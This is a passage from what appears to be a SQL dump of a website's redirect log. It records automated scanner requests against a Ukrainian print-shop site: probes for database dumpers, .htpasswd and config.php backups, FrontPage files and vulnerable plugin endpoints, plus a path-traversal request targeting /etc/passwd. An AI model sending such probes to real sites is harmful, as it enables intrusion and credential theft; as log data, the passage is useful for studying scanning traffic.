00:00:00',301),(13213,'http://ekvatorprint.com.ua/dumper/sql.php',NULL,'','',2,0,'2018-04-24 09:05:11','0000-00-00 00:00:00',301),(13214,'http://ekvatorprint.com.ua/msd/sql.php',NULL,'','',2,0,'2018-04-24 09:05:11','0000-00-00 00:00:00',301),(13215,'http://ekvatorprint.com.ua/msd1.24.2/sql.php',NULL,'','',2,0,'2018-04-24 09:05:11','0000-00-00 00:00:00',301),(13216,'http://ekvatorprint.com.ua/msd1.24.3/sql.php',NULL,'','',2,0,'2018-04-24 09:05:11','0000-00-00 00:00:00',301),(13217,'http://ekvatorprint.com.ua/msd1.24.4/sql.php',NULL,'','',2,0,'2018-04-24 09:05:11','0000-00-00 00:00:00',301),(13218,'http://ekvatorprint.com.ua/msd1.24stable/sql.php',NULL,'','',2,0,'2018-04-24 09:05:12','0000-00-00 00:00:00',301),(13219,'http://ekvatorprint.com.ua/myadmin/sql.php',NULL,'','',2,0,'2018-04-24 09:05:12','0000-00-00 00:00:00',301),(13220,'http://ekvatorprint.com.ua/mysql/sql.php',NULL,'','',2,0,'2018-04-24 09:05:12','0000-00-00 00:00:00',301),(13221,'http://ekvatorprint.com.ua/mysqldumper/sql.php',NULL,'','',2,0,'2018-04-24 09:05:12','0000-00-00 00:00:00',301),(13222,'http://ekvatorprint.com.ua/sql/sql.php',NULL,'','',2,0,'2018-04-24 09:05:12','0000-00-00 00:00:00',301),(13223,'http://ekvatorprint.com.ua/wp-content/plugins/estatik/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/estatik/readme.txt','',3,0,'2018-04-24 16:43:24','0000-00-00 00:00:00',301),(13224,'http://ekvatorprint.com.ua/missok.php?x=1',NULL,'','',2,0,'2018-04-24 20:06:01','0000-00-00 00:00:00',301),(13225,'http://ekvatorprint.com.ua/misc/drupal.js',NULL,'','',1,0,'2018-04-25 14:59:56','0000-00-00 00:00:00',301),(13226,'http://ekvatorprint.com.ua/print-flags@10',NULL,'http://ekvatorprint.com.ua/print-flags%4010','',1,0,'2018-04-29 14:23:09','0000-00-00 00:00:00',301),(13227,'http://ekvatorprint.com.ua/htpasswd.old',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-29 19:35:32','0000-00-00 00:00:00',301),(13228,'http://ekvatorprint.com.ua/a.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-29 23:22:24','0000-00-00 00:00:00',301),(13229,'http://ekvatorprint.com.ua/b.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-30 01:18:37','0000-00-00 00:00:00',301),(13230,'http://ekvatorprint.com.ua/c.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-30 03:19:59','0000-00-00 00:00:00',301),(13231,'http://ekvatorprint.com.ua/d.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-30 05:16:50','0000-00-00 00:00:00',301),(13232,'http://ekvatorprint.com.ua/e.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-30 07:11:14','0000-00-00 00:00:00',301),(13233,'http://ekvatorprint.com.ua/f.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-30 09:31:59','0000-00-00 00:00:00',301),(13234,'http://ekvatorprint.com.ua/g.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-30 12:31:22','0000-00-00 00:00:00',301),(13235,'http://ekvatorprint.com.ua/h.htpasswd',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-30 15:43:20','0000-00-00 00:00:00',301),(13236,'http://ekvatorprint.com.ua/access_log/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 01:21:26','0000-00-00 00:00:00',301),(13237,'http://ekvatorprint.com.ua/cgi-script/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 04:19:51','0000-00-00 00:00:00',301),(13238,'http://ekvatorprint.com.ua/WP/',NULL,'','',3,0,'2018-05-01 04:38:31','0000-00-00 00:00:00',301),(13239,'http://ekvatorprint.com.ua/beta/',NULL,'','',3,0,'2018-05-01 04:38:32','0000-00-00 00:00:00',301),(13240,'http://ekvatorprint.com.ua/blogs/',NULL,'','',4,0,'2018-05-01 04:38:32','0000-00-00 00:00:00',301),(13241,'http://ekvatorprint.com.ua/demo/',NULL,'','',4,0,'2018-05-01 04:38:33','0000-00-00 00:00:00',301),(13242,'http://ekvatorprint.com.ua/main/',NULL,'','',4,0,'2018-05-01 04:38:34','0000-00-00 00:00:00',301),(13243,'http://ekvatorprint.com.ua/new/',NULL,'','',3,0,'2018-05-01 04:38:34','0000-00-00 00:00:00',301),(13244,'http://ekvatorprint.com.ua/news/',NULL,'','',3,0,'2018-05-01 04:38:34','0000-00-00 00:00:00',301),(13245,'http://ekvatorprint.com.ua/portal/',NULL,'','',3,0,'2018-05-01 04:38:34','0000-00-00 00:00:00',301),(13246,'http://ekvatorprint.com.ua/press/',NULL,'','',3,0,'2018-05-01 04:38:35','0000-00-00 00:00:00',301),(13247,'http://ekvatorprint.com.ua/v1/',NULL,'','',4,0,'2018-05-01 04:38:35','0000-00-00 00:00:00',301),(13248,'http://ekvatorprint.com.ua/v2/',NULL,'','',4,0,'2018-05-01 04:38:35','0000-00-00 00:00:00',301),(13249,'http://ekvatorprint.com.ua/wp/test/',NULL,'','',3,0,'2018-05-01 04:38:36','0000-00-00 00:00:00',301),(13250,'http://ekvatorprint.com.ua/dummy/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 07:32:24','0000-00-00 00:00:00',301),(13251,'http://ekvatorprint.com.ua/error_log/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 10:46:35','0000-00-00 00:00:00',301),(13252,'http://ekvatorprint.com.ua/htdocs.old',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 13:42:00','0000-00-00 00:00:00',301),(13253,'http://ekvatorprint.com.ua/configuracion/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 16:23:26','0000-00-00 00:00:00',301),(13254,'http://ekvatorprint.com.ua/connections/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 19:11:00','0000-00-00 00:00:00',301),(13255,'http://ekvatorprint.com.ua/forums/config.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-01 22:08:24','0000-00-00 00:00:00',301),(13256,'http://ekvatorprint.com.ua/inc/config.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-02 01:24:00','0000-00-00 00:00:00',301),(13257,'http://ekvatorprint.com.ua/inc/dbase.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-02 04:47:02','0000-00-00 00:00:00',301),(13258,'http://ekvatorprint.com.ua/doc/webmin.config.notes',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-02 08:13:22','0000-00-00 00:00:00',301),(13259,'http://ekvatorprint.com.ua/priceё',NULL,'','',1,0,'2018-05-02 10:01:08','0000-00-00 00:00:00',301),(13260,'http://ekvatorprint.com.ua/ADMINconfig.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-02 11:28:33','0000-00-00 00:00:00',301),(13261,'http://ekvatorprint.com.ua/forums/@ADMINconfig.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-02 14:31:40','0000-00-00 00:00:00',301),(13262,'http://ekvatorprint.com.ua/webcart-lite/config/import.txt',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-02 23:42:55','0000-00-00 00:00:00',301),(13263,'http://ekvatorprint.com.ua/webcart/config/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-03 02:50:31','0000-00-00 00:00:00',301),(13264,'http://ekvatorprint.com.ua/webcart/config/clients.txt',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-03 05:51:27','0000-00-00 00:00:00',301),(13265,'http://ekvatorprint.com.ua/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv/logs/../../../../../../etc&id=admin-serv',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-03 08:49:54','0000-00-00 00:00:00',301),(13266,'http://ekvatorprint.com.ua/USER/CONFIG.AP',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-03 12:08:09','0000-00-00 00:00:00',301),(13267,'http://ekvatorprint.com.ua/phpinfoer.php',NULL,'','',2,0,'2018-05-03 14:01:23','0000-00-00 00:00:00',301),(13268,'http://ekvatorprint.com.ua/Config1.htm',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-03 15:20:16','0000-00-00 00:00:00',301),(13269,'http://ekvatorprint.com.ua/................../config.sys',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-03 18:24:48','0000-00-00 00:00:00',301),(13270,'http://ekvatorprint.com.ua/chassis/config/GeneralChassisConfig.html',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-04 03:13:29','0000-00-00 00:00:00',301),(13271,'http://ekvatorprint.com.ua/wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader/action.php',NULL,'','',1,0,'2018-05-04 03:34:27','0000-00-00 00:00:00',301),(13272,'http://ekvatorprint.com.ua/exec/show/config/cr/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-04 20:05:35','0000-00-00 00:00:00',301),(13273,'http://ekvatorprint.com.ua/myinvoicer/config.inc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-04 22:32:40','0000-00-00 00:00:00',301),(13274,'http://ekvatorprint.com.ua/php-coolfile/action.php?action=edit&file=config.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-04 23:22:42','0000-00-00 00:00:00',301),(13275,'http://ekvatorprint.com.ua/level/16/exec/-/show/configuration/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 00:13:16','0000-00-00 00:00:00',301),(13276,'http://ekvatorprint.com.ua/level/16/level/16/exec/show/configuration/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 01:11:32','0000-00-00 00:00:00',301),(13277,'http://ekvatorprint.com.ua/level/16/level/16/exec/show/running-config/interface/FastEthernet/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 02:13:32','0000-00-00 00:00:00',301),(13278,'http://ekvatorprint.com.ua/gallery/errors/configmode.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 03:14:41','0000-00-00 00:00:00',301),(13279,'http://ekvatorprint.com.ua/gallery/errors/reconfigure.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 04:14:51','0000-00-00 00:00:00',301),(13280,'http://ekvatorprint.com.ua/wp-info.php',NULL,'','',2,0,'2018-05-05 05:02:41','0000-00-00 00:00:00',301),(13281,'http://ekvatorprint.com.ua/gallery/errors/unconfigured.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 05:14:51','0000-00-00 00:00:00',301),(13282,'http://ekvatorprint.com.ua/config/checks.txt',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 09:11:29','0000-00-00 00:00:00',301),(13283,'http://ekvatorprint.com.ua/adsamples/config/site.csc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 11:04:20','0000-00-00 00:00:00',301),(13284,'http://ekvatorprint.com.ua/admin/cfg/configscreen.inc.php+',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 12:20:15','0000-00-00 00:00:00',301),(13285,'http://ekvatorprint.com.ua/admin/cfg/configsite.inc.php+',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 13:11:34','0000-00-00 00:00:00',301),(13286,'http://ekvatorprint.com.ua/admin/cfg/configsql.inc.php+',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 13:59:28','0000-00-00 00:00:00',301),(13287,'http://ekvatorprint.com.ua/admin/cfg/configtache.inc.php+',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 14:47:46','0000-00-00 00:00:00',301),(13288,'http://ekvatorprint.com.ua/config/html/cnf_gi.htm',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 15:35:27','0000-00-00 00:00:00',301),(13289,'http://ekvatorprint.com.ua/pt_config.inc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 16:23:51','0000-00-00 00:00:00',301),(13290,'http://ekvatorprint.com.ua/shop/php_files/site.config.php+',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 17:11:40','0000-00-00 00:00:00',301),(13291,'http://ekvatorprint.com.ua/data/config/microsrv.cfg',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 19:07:20','0000-00-00 00:00:00',301),(13292,'http://ekvatorprint.com.ua/soapConfig.xml',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-05 20:05:26','0000-00-00 00:00:00',301),(13293,'http://ekvatorprint.com.ua/WINNT/system32/ipconfig.exe',NULL,'http://ekvatorprint.com.ua/','',3,0,'2018-05-06 03:03:48','0000-00-00 00:00:00',301),(13294,'http://ekvatorprint.com.ua/IBMWebAS/configDocs/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 06:02:12','0000-00-00 00:00:00',301),(13295,'http://ekvatorprint.com.ua/getconfig/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 08:00:59','0000-00-00 00:00:00',301),(13296,'http://ekvatorprint.com.ua/stconfig.nsf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 09:00:10','0000-00-00 00:00:00',301),(13297,'http://ekvatorprint.com.ua/OpenMarket/Xcelerate/Admin/AssetTypeClientConfigFront/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 09:58:43','0000-00-00 00:00:00',301),(13298,'http://ekvatorprint.com.ua/OpenMarket/Xcelerate/Admin/AssetTypeClientConfigPost/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 10:58:12','0000-00-00 00:00:00',301),(13299,'http://ekvatorprint.com.ua/admin-serv/config/admpw/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 12:06:10','0000-00-00 00:00:00',301),(13300,'http://ekvatorprint.com.ua/ConfigServlet/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 13:16:15','0000-00-00 00:00:00',301),(13301,'http://ekvatorprint.com.ua/examples/jsp/jsp2/misc/config.jsp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 14:25:20','0000-00-00 00:00:00',301),(13302,'http://ekvatorprint.com.ua/servlet/ConfigServlet/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 15:25:41','0000-00-00 00:00:00',301),(13303,'http://ekvatorprint.com.ua/_layouts/SpUsageConfig.aspx',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 16:19:34','0000-00-00 00:00:00',301),(13304,'http://ekvatorprint.com.ua/_layouts/policyconfig.aspx',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 17:10:52','0000-00-00 00:00:00',301),(13305,'http://ekvatorprint.com.ua/colorConfig.ini.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-06 23:04:04','0000-00-00 00:00:00',301),(13306,'http://ekvatorprint.com.ua/com_config/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 00:10:03','0000-00-00 00:00:00',301),(13307,'http://ekvatorprint.com.ua/plugins/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/plugins/jquery-file-upload/server/php/','',1,0,'2018-05-07 03:17:33','0000-00-00 00:00:00',301),(13308,'http://ekvatorprint.com.ua/ConfigSchema.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 03:22:11','0000-00-00 00:00:00',301),(13309,'http://ekvatorprint.com.ua/tcpdf_config.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 05:16:32','0000-00-00 00:00:00',301),(13310,'http://ekvatorprint.com.ua/_config/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 08:16:03','0000-00-00 00:00:00',301),(13311,'http://ekvatorprint.com.ua/_mem_bin/auoconfig.asp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 09:18:21','0000-00-00 00:00:00',301),(13312,'http://ekvatorprint.com.ua/config-old/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 10:22:07','0000-00-00 00:00:00',301),(13313,'http://ekvatorprint.com.ua/config_site.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 11:25:34','0000-00-00 00:00:00',301),(13314,'http://ekvatorprint.com.ua/configs/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 12:28:11','0000-00-00 00:00:00',301),(13315,'http://ekvatorprint.com.ua/configurator/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 14:31:08','0000-00-00 00:00:00',301),(13316,'http://ekvatorprint.com.ua/configure/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 15:36:33','0000-00-00 00:00:00',301),(13317,'http://ekvatorprint.com.ua/dm-config/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 16:38:54','0000-00-00 00:00:00',301),(13318,'http://ekvatorprint.com.ua/fckconfig.js',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 17:40:56','0000-00-00 00:00:00',301),(13319,'http://ekvatorprint.com.ua/glance_config/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 18:32:13','0000-00-00 00:00:00',301),(13320,'http://ekvatorprint.com.ua/RTE_configuration/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 19:30:19','0000-00-00 00:00:00',301),(13321,'http://ekvatorprint.com.ua/upgrade_config.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 21:31:52','0000-00-00 00:00:00',301),(13322,'http://ekvatorprint.com.ua/wp-config/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 22:34:23','0000-00-00 00:00:00',301),(13323,'http://ekvatorprint.com.ua/_vti_bin/shtml.exe/junk_nonexistant.exe',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-07 23:37:16','0000-00-00 00:00:00',301),(13324,'http://ekvatorprint.com.ua/_vti_txt/_vti_cnf/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 00:42:46','0000-00-00 00:00:00',301),(13325,'http://ekvatorprint.com.ua/_vti_pvt/deptodoc.btr',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 02:49:12','0000-00-00 00:00:00',301),(13326,'http://ekvatorprint.com.ua/_vti_pvt/doctodep.btr',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 03:53:58','0000-00-00 00:00:00',301),(13327,'http://ekvatorprint.com.ua/_vti_pvt/services.org',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 04:55:28','0000-00-00 00:00:00',301),(13328,'http://ekvatorprint.com.ua/_vti_bin/shtml.dll/_vti_rpc?method=server+version:4.0.2.2611',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 05:53:41','0000-00-00 00:00:00',301),(13329,'http://ekvatorprint.com.ua/_vti_bin/shtml.exe/_vti_rpc?method=server+version:4.0.2.2611',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 06:52:22','0000-00-00 00:00:00',301),(13330,'http://ekvatorprint.com.ua/_vti_bin/_vti_aut/author.exe?method=list+documents:3.0.2.1706&service_name=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 08:48:32','0000-00-00 00:00:00',301),(13331,'http://ekvatorprint.com.ua/_vti_pvt/access.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 12:35:23','0000-00-00 00:00:00',301),(13332,'http://ekvatorprint.com.ua/_vti_pvt/botinfs.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 13:36:47','0000-00-00 00:00:00',301),(13333,'http://ekvatorprint.com.ua/_vti_pvt/bots.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 14:39:26','0000-00-00 00:00:00',301),(13334,'http://ekvatorprint.com.ua/_vti_pvt/service.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 15:48:42','0000-00-00 00:00:00',301),(13335,'http://ekvatorprint.com.ua/_vti_pvt/services.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 16:46:31','0000-00-00 00:00:00',301),(13336,'http://ekvatorprint.com.ua/_vti_pvt/svacl.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 17:47:34','0000-00-00 00:00:00',301),(13337,'http://ekvatorprint.com.ua/_vti_pvt/writeto.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 18:51:37','0000-00-00 00:00:00',301),(13338,'http://ekvatorprint.com.ua/_vti_pvt/linkinfo.cnf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 19:51:42','0000-00-00 00:00:00',301),(13339,'http://ekvatorprint.com.ua/config.php.001',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 21:00:56','0000-00-00 00:00:00',301),(13340,'http://ekvatorprint.com.ua/config.php.002',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 21:55:48','0000-00-00 00:00:00',301),(13341,'http://ekvatorprint.com.ua/config.php.1',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 22:53:35','0000-00-00 00:00:00',301),(13342,'http://ekvatorprint.com.ua/index.php?page=shop.recommend&product_id=1&pop=1&tmpl=component&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1',NULL,'','',1,0,'2018-05-08 23:04:33','0000-00-00 00:00:00',301),(13343,'http://ekvatorprint.com.ua/config.php.2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-08 23:47:27','0000-00-00 00:00:00',301),(13344,'http://ekvatorprint.com.ua/config.php.7z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 00:45:34','0000-00-00 00:00:00',301),(13345,'http://ekvatorprint.com.ua/config.php.Z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 01:55:55','0000-00-00 00:00:00',301),(13346,'http://ekvatorprint.com.ua/db_z.php',NULL,'','',2,0,'2018-05-09 02:10:59','0000-00-00 00:00:00',301),(13347,'http://ekvatorprint.com.ua/config.php.back',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 03:51:08','0000-00-00 00:00:00',301),(13348,'http://ekvatorprint.com.ua/config.php.backup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 05:54:23','0000-00-00 00:00:00',301),(13349,'http://ekvatorprint.com.ua/config.php.bakup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 07:55:27','0000-00-00 00:00:00',301),(13350,'http://ekvatorprint.com.ua/config.php.bas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 09:45:50','0000-00-00 00:00:00',301),(13351,'http://ekvatorprint.com.ua/config.php.bz2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 11:25:40','0000-00-00 00:00:00',301),(13352,'http://ekvatorprint.com.ua/config.php.c',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 13:03:55','0000-00-00 00:00:00',301),(13353,'http://ekvatorprint.com.ua/config.php.conf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 14:40:11','0000-00-00 00:00:00',301),(13354,'http://ekvatorprint.com.ua/config.php.copia',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 16:16:05','0000-00-00 00:00:00',301),(13355,'http://ekvatorprint.com.ua/config.php.core',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 17:56:03','0000-00-00 00:00:00',301),(13356,'http://ekvatorprint.com.ua/config.php.cpp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 19:55:38','0000-00-00 00:00:00',301),(13357,'http://ekvatorprint.com.ua/config.php.dat',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 21:36:21','0000-00-00 00:00:00',301),(13358,'http://ekvatorprint.com.ua/config.php.db',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-09 23:28:30','0000-00-00 00:00:00',301),(13359,'http://ekvatorprint.com.ua/ftpsync.settings',NULL,'','',3,0,'2018-05-10 00:44:33','0000-00-00 00:00:00',301),(13360,'http://ekvatorprint.com.ua/config.php.default',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 01:12:41','0000-00-00 00:00:00',301),(13361,'http://ekvatorprint.com.ua/config.php.dll',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 02:58:35','0000-00-00 00:00:00',301),(13362,'http://ekvatorprint.com.ua/beck/cron.php',NULL,'','',2,0,'2018-05-10 04:03:12','0000-00-00 00:00:00',301),(13363,'http://ekvatorprint.com.ua/config.php.doc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 04:41:49','0000-00-00 00:00:00',301),(13364,'http://ekvatorprint.com.ua/config.php.ini',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 06:29:25','0000-00-00 00:00:00',301),(13365,'http://ekvatorprint.com.ua/config.php.jar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 08:12:29','0000-00-00 00:00:00',301),(13366,'http://ekvatorprint.com.ua/config.php.java',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 10:01:29','0000-00-00 00:00:00',301),(13367,'http://ekvatorprint.com.ua/config.php.orig',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 13:37:39','0000-00-00 00:00:00',301),(13368,'http://ekvatorprint.com.ua/config.php.pas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 15:24:24','0000-00-00 00:00:00',301),(13369,'http://ekvatorprint.com.ua/config.php.rar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 17:10:26','0000-00-00 00:00:00',301),(13370,'http://ekvatorprint.com.ua/config.php.sav',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 18:53:18','0000-00-00 00:00:00',301),(13371,'http://ekvatorprint.com.ua/config.php.saved',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 20:17:22','0000-00-00 00:00:00',301),(13372,'http://ekvatorprint.com.ua/config.php.source',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 21:01:56','0000-00-00 00:00:00',301),(13373,'http://ekvatorprint.com.ua/config.php.src',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 21:54:28','0000-00-00 00:00:00',301),(13374,'http://ekvatorprint.com.ua/config.php.stackdump',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 22:46:46','0000-00-00 00:00:00',301),(13375,'http://ekvatorprint.com.ua/config.php.tar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-10 23:38:51','0000-00-00 00:00:00',301),(13376,'http://ekvatorprint.com.ua/config.php.tar.gz',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 00:31:03','0000-00-00 00:00:00',301),(13377,'http://ekvatorprint.com.ua/wp-json/wp/v2/users/?per_page=100',NULL,'','',3,0,'2018-05-11 00:40:27','0000-00-00 00:00:00',301),(13378,'http://ekvatorprint.com.ua/config.php.temp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 01:23:54','0000-00-00 00:00:00',301),(13379,'http://ekvatorprint.com.ua/config.php.test',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 02:17:23','0000-00-00 00:00:00',301),(13380,'http://ekvatorprint.com.ua/config.php.tgz',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 03:12:35','0000-00-00 00:00:00',301),(13381,'http://ekvatorprint.com.ua/config.php.tmp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 04:04:41','0000-00-00 00:00:00',301),(13382,'http://ekvatorprint.com.ua/config.php.war',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 05:48:07','0000-00-00 00:00:00',301),(13383,'http://ekvatorprint.com.ua/config.php.zip',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 06:40:08','0000-00-00 00:00:00',301),(13384,'http://ekvatorprint.com.ua/config.php copy.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 09:51:40','0000-00-00 00:00:00',301),(13385,'http://ekvatorprint.com.ua/Copy of config.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 10:55:16','0000-00-00 00:00:00',301),(13386,'http://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/admin/css/widget-rules.css',NULL,'','',1,0,'2018-05-11 15:42:35','0000-00-00 00:00:00',301),(13387,'http://ekvatorprint.com.ua/configuration.php.001',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 16:24:43','0000-00-00 00:00:00',301),(13388,'http://ekvatorprint.com.ua/price&amp',NULL,'','',7,0,'2018-05-11 16:41:07','0000-00-00 00:00:00',301),(13389,'http://ekvatorprint.com.ua/configuration.php.002',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 17:43:19','0000-00-00 00:00:00',301),(13390,'http://ekvatorprint.com.ua/configuration.php.1',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 19:11:02','0000-00-00 00:00:00',301),(13391,'http://ekvatorprint.com.ua/configuration.php.2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 20:35:19','0000-00-00 